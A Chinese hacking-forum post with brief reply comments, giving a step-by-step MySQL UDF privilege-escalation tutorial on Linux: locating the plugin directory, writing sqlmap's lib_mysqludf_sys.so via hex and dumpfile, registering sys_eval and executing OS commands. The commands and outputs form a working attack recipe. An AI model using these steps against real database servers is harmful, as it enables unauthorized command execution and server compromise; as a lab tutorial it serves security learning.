查看: 48935|回复: 100

Linux UDF Mysql提权

[复制链接]
  • TA的每日心情

    2024-10-23 14:35
  • 签到天数: 917 天

    [LV.10]以坛为家III

    发表于 2015-8-3 16:57:07 | 显示全部楼层 |阅读模式
    环境:
    os:linux(bt5)
    database:mysql

    简述:
    通过自定义库函数来实现执行任意的程序,这里只在linux下测试通过,具体到windows,所用的dll自然不同。
    要求:
    在mysql库下必须有func表,并且在‑‑skip‑grant‑tables开启的情况下,UDF会被禁止;

    过程: 得到插件库路径 找对应操作系统的udf库文件 利用udf库文件加载函数并执行命令
    1,得到插件库路径
    show variables like "%plugin%";
    回显:如下
    +---------------+-----------------------+

    | Variable_name | Value |

    +---------------+-----------------------+

    | plugin_dir | /usr/lib/mysql/plugin |

    +---------------+-----------------------+

    1 row in set (0.00 sec)
    2,找对应操作系统的udf库文件
    因为自己测试,看了下自己系统的版本,64位
    root@bt:~# uname -a
    Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux
    对于udf文件,在sqlmap工具中自带就有,只要找对应操作系统的版本即可
    root@bt:/pentest/database/sqlmap/udf/mysql# ls
    linux  windows
    root@bt:/pentest/database/sqlmap/udf/mysql/linux# ls
    32  64
    root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls
    lib_mysqludf_sys.so
    3,利用udf库文件加载函数并执行命令
    首先要得到udf库文件的十六进制格式,可在本地通过
    select hex(load_file(‘/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so’)) into outfile ‘/tmp/udf.txt';
    Query OK, 1 row affected (0.04 sec)
    因为我测试时,使用自带账户,账户名mysql,并不是root,所以插件目录不可写,而实际中,一般udf提权都是用root权限启动的mysql程序,故,不存在目录权限不足,不能访问的情况。为了继续,修改目录权限
    root@bt:~# chmod 777 /usr/lib/mysql/plugin
    数据库中写入udf库到mysql库目录:
    select unhex('7F454C46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
    Query OK, 1 row affected (0.04 sec)
    查看下这个udf库所支持的函数
    [PHP] 纯文本查看 复制代码
    root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so
                     w _Jv_RegisterClasses
    0000000000201788 A __bss_start
                     w __cxa_finalize
                     w __gmon_start__
    0000000000201788 A _edata
    0000000000201798 A _end
    0000000000001178 T _fini
    0000000000000ba0 T _init
                     U fgets
                     U fork
                     U free
                     U getenv
    000000000000101a T lib_mysqludf_sys_info
    0000000000000da4 T lib_mysqludf_sys_info_deinit
    0000000000001047 T lib_mysqludf_sys_info_init
                     U malloc
                     U mmap
                     U pclose
                     U popen
                     U realloc
                     U setenv
                     U strcpy
                     U strncpy
    0000000000000dac T sys_bineval
    0000000000000dab T sys_bineval_deinit
    0000000000000da8 T sys_bineval_init
    0000000000000e46 T sys_eval
    0000000000000da7 T sys_eval_deinit
    0000000000000f2e T sys_eval_init
    0000000000001066 T sys_exec
    0000000000000da6 T sys_exec_deinit
    0000000000000f57 T sys_exec_init
    00000000000010f7 T sys_get
    0000000000000da5 T sys_get_deinit
    0000000000000fea T sys_get_init
    000000000000107a T sys_set
    00000000000010e8 T sys_set_deinit
    0000000000000f80 T sys_set_init
                     U sysconf
                     U system
                     U waitpid
                     U system
                     U waitpid
    最后,加载函数并执行:
    create function sys_eval returns string soname "mysqludf.so";
                                                                    
    
    Query OK, 0 rows affected (0.14 sec)
    select sys_eval('whoami');
                                                                    
    
    +--------------------+
                                                                    
    
    | sys_eval('whoami') |
                                                                    
    
    +--------------------+
                                                                    
    
    | mysql              |
                                                                    
    
    +--------------------+
                                                                    
    
    1 row in set (0.04 sec)
    select * from mysql.func;
                                                                    
    
    +----------+-----+-------------+----------+
                                                                    
    
    | name     | ret | dl          | type     |
                                                                    
    
    +----------+-----+-------------+----------+
                                                                    
    
    | sys_eval |   0 | mysqludf.so | function |
                                                                    
    
    +----------+-----+-------------+----------+
                                                                    
    
    1 row in set

    回复

    使用道具 举报

  • TA的每日心情
    开心
    2016-3-4 11:35
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2015-8-3 19:32:28 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-4 01:58:29 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-5 08:35:43 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-3-4 11:35
  • 签到天数: 3 天

    [LV.2]偶尔看看I

    发表于 2015-8-5 19:17:06 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-5 20:14:41 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-6 21:32:59 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-4-14 17:44
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2015-8-8 21:48:57 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-9 01:13:42 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-9 01:14:47 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-1 23:39 , Processed in 0.021818 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部